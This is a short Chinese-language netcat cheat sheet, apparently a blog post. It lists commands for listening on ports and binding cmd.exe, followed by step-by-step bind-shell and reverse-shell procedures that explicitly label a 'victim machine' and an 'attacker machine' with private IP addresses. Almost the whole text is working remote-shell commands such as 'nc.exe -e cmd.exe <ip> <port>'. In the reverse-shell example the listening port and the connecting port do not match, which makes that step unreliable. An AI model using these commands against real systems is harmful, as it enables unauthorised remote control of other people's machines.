netcat常用命令说明

命令说明:

监听端口

1
nc.exe -l -p 8888

监听端口并执行cmd

1
nc.exe -l -p 8888 -e cmd.exe

直接正向连接 IP + 端口

1
nc.exe -nvv 192.168.81.140 8888

将 cmd 转发到 IP + 端口

1
nc.exe -e cmd.exe 192.168.81.128 8889

实战使用:

正向:

  1. 受害机器上执行监听 8888 端口并执行 cmd:
    1
    nc.exe -l -p 8888 -e cmd.exe
  2. 攻击机直接连接受害机器 IP + 端口
    1
    nc.exe -nvv 192.168.81.140 8888
  3. 攻击机即可执行shell

反向:

  1. 攻击机监听 8888 端口
    1
    nc.exe -l -p 8888
  2. 受害机器上将 cmd 转发到攻击机 IP + 端口
    1
    nc.exe -e cmd.exe 192.168.81.128 8889
  3. 攻击机即可接收到受害机器的反弹shell